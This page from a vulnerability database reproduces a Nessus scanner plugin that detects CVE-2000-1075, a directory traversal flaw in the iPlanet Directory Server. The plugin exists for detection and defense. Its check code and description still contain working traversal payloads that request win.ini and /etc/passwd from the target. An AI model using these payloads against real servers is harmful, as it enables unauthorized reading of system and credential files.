Lucene search
K

iPlanet Directory Server Traversal Arbitrary File Access

🗓️ 08 Jan 2001 00:00:00Reported by TenableType 
nessus
 nessus
🔗 www.tenable.com👁 36 Views

Remote iPlanet Directory Server vulnerable to directory traversal, allowing file access.

Related
Refs
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2000-1075
7 May 200104:00
cve
Cvelist
CVE-2000-1075
7 May 200104:00
cvelist
EUVD
EUVD-2000-1061
7 Oct 202500:30
euvd
Tenable Nessus
iPlanet Certificate Management Traversal Arbitrary File Access
29 May 200100:00
nessus
NVD
CVE-2000-1075
11 Dec 200005:00
nvd
Packet Storm
accipiter.txt
9 Jan 200400:00
packetstorm
securityvulns
[Full-Disclosure] Directory Traversal in Accipiter Direct Server 6.0
11 Jan 200400:00
securityvulns
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

if(description)
{
 script_id(10589);
 script_version ("1.29");
 script_cve_id("CVE-2000-1075");
 script_bugtraq_id(1839);

 script_name(english:"iPlanet Directory Server Traversal Arbitrary File Access");

 script_set_attribute(attribute:"synopsis", value:
"The remote web server is affected by a directory traversal
vulnerability." );
 script_set_attribute(attribute:"description", value:
"There is a bug in the remote iPlanet web server that allows a user to
read arbitrary files on the remote host. 

To exploit this flaw, an attacker needs to prepend '/\../\../'
to the file name to read." );
 script_set_attribute(attribute:"solution", value:
"http://www.iplanet.com/downloads/patches/index.html" );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2001/01/08");
 script_set_attribute(attribute:"vuln_publication_date", value: "2000/10/26");
 script_cvs_date("Date: 2018/07/12 19:01:16");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

 
 script_summary(english:"/\../\../\file.txt");
 
 script_category(ACT_ATTACK);
 
 script_copyright(english:"This script is Copyright (C) 2001-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
 script_family(english:"Web Servers");
 script_dependencie("http_version.nasl");
 script_require_ports("Services/www", 8100);
 exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");

function check(port)
{
 local_var r, report, u1, u2, u3, w;

 u1 = string("/ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini");		
 u2 = string("/ca/..\\..\\..\\..\\..\\..\\winnt/\\win.ini");
 u3 = string("/ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd");

 w = http_send_recv3(method: "GET", port:port, item: u1);
 if (isnull(w)) return(0);
 r = w[2];

 if("[windows]" >< r){
	report = '\nBy requesting ' + u1 + ' one obtains :\n' + r;
  	security_warning(port:port, extra:report);
	return(0);
	}
	
 w = http_send_recv3(method:"GET", port:port, item: u2);
 if (isnull(w)) exit(0);
 r = w[2];
 if("[fonts]" >< r){
	report = '\nBy requesting ' + u2 + ' one obtains :\n' + r;
  	security_warning(port:port, extra:report);
	return(0);
	}
	
  w = http_send_recv3(port:port, method:"GET", item: u3);
  if (isnull(w)) exit(0);
  r = w[2];
  if(egrep(pattern:".*root:.*:0:[01]:.*", string:r))
	{
  r = data_protection::redact_etc_passwd(output:r);
	report = '\nBy requesting ' + u3 + ' one obtains :\n' + r;
  	security_warning(port:port, extra:report);
	return(0);
	}
}

ports = add_port_in_list(list:get_kb_list("Services/www"), port:8100);

foreach port (ports)
{
 banner = get_http_banner(port:port);
 if ( "iPlanet" >!< banner && report_paranoia < 2) exit(0);
 check(port:port);
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Jul 2018 19:01Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.04012
36